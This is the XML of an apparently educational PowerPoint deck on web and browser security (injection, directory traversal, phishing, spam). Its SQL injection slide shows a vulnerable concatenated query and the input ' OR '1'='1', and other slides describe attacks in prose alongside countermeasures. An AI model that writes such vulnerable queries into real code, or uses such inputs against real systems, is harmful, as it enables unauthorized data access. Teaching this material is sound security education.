              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injecting SQL code into an exchange between an application and its database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loading an SQL query into a variable, taking the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>acctNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from an arbitrary user input field:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>QUERY = "SELECT * FROM trans WHERE acct = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>acctNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>The same query with malicious user input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>QUERY = "SELECT * FROM trans WHERE acct = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'2468</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>OR '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New"/>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79441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Dot-Dot-Slash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also known as “directory traversal,” this is when attackers use the term “../” to access files that are on the target web server but not meant to be accessed from outside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.26.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36" y="4055278"/>
            <a:ext cx="8326718" cy="547351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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02002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Include (SSI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSI is an interpreted server-side scripting language that can be used for basic web server directives, such as including files and executing commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As is the case with XSS, some websites are vulnerable to allowing users to execute SSI directives through text input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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.27.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677" y="4363568"/>
            <a:ext cx="4686300" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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73459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Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks against browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fake and malicious websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks targeting sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing attacks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75997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Countermeasures to Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filter and sanitize all user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to account for every potentially valid encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make no assumptions about the range of possible user inputs—trust nothing, check everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use access control mechanisms on backend servers, such as “stored procedures”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882052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Spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Experts estimate that 60% to 90% of all email is spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Types of spam:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pharmaceuticals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Links for malicious websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Laws against spam exist but are generally ineffective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Email filters have become very effective for most spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet service providers use volume limitations to make spammers’ jobs more difficult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95402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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1435849"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A message that tries to trick a victim into providing private information or taking some other unsafe action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spear phishing: A targeted attack that is personalized to a particular recipient or set of recipients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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="fig04-16.t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764" y="3054875"/>
            <a:ext cx="4331049" cy="3474720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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598848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Countermeasures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limited effectiveness and very subject to co-evolution with attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PGP and S/MIME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptographic solutions that have seen very limited adoption after years on the market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07400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As web browsers have become a primary focus of users and taken on greater functionality, they’ve become a focus of many types of attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser and website weaknesses are often the result of some form of poor authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many attackers focus on tricking users with fake websites, misleading applications, and phishing emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On the server side, injection attacks are a key concern, and countermeasures to prevent them are critical</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6360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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-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l="590" r="293"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="564144" y="1791371"/>
            <a:ext cx="7992541" cy="4364789"/>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7030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Attack Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Man-in-the-browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Keystroke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>logger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Page-in-the-middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Program download substitution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>User-in-the-middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="36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2139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Man-in-the-Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-0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42" b="-4361"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="988806" y="1563624"/>
            <a:ext cx="7162800" cy="4987746"/>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92661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Keystroke Logger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Hardware or software that records all keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>May be a small dongle plugged into a USB port or can masquerade as a keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>May also be installed as malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Not limited to browsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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90972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Page-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>User is directed to a different page than believed or intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Similar effect to a man-in-the-browser, where attacker can intercept and modify user input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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1852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Download Substitution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Attacker creates a page with seemingly innocuous and desirable programs for download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Instead of, or in addition to, the intended functionality, the user installs malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This is a very common technique for spyware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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5945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User-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="fig04-04.tif"/>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438" r="38263"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282222" y="2130777"/>
            <a:ext cx="4065291" cy="3744637"/>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8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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4423787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TotalTime>
  <Words>2109</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>167</Paragraphs>
  <Slides>24</Slides>
  <Notes>13</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Clarity</vt:lpstr>
      <vt:lpstr>Security in Computing, Fifth Edition</vt:lpstr>
      <vt:lpstr>Chapter 4 Objectives</vt:lpstr>
      <vt:lpstr>Browser Vulnerabilities</vt:lpstr>
      <vt:lpstr>Browser Attack Types</vt:lpstr>
      <vt:lpstr>Man-in-the-Browser</vt:lpstr>
      <vt:lpstr>Keystroke Logger</vt:lpstr>
      <vt:lpstr>Page-in-the-Middle</vt:lpstr>
      <vt:lpstr>Program Download Substitution</vt:lpstr>
      <vt:lpstr>User-in-the-Middle</vt:lpstr>
      <vt:lpstr>Successful Authentication</vt:lpstr>
      <vt:lpstr>Fake Website</vt:lpstr>
      <vt:lpstr>Fake Code</vt:lpstr>
      <vt:lpstr>Tracking Bug</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Drive-By Download</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Dot-Dot-Slash</vt:lpstr>
      <vt:lpstr>Server-Side Include (SSI)</vt:lpstr>
      <vt:lpstr>Countermeasures to Injections</vt:lpstr>
      <vt:lpstr>Email Spam</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Countermeasures</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Qmulos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Elizabeth Ryan</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-13T18:52:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-10-14T19:09:52Z</dcterms:modified>
</cp:coreProperties>
</file>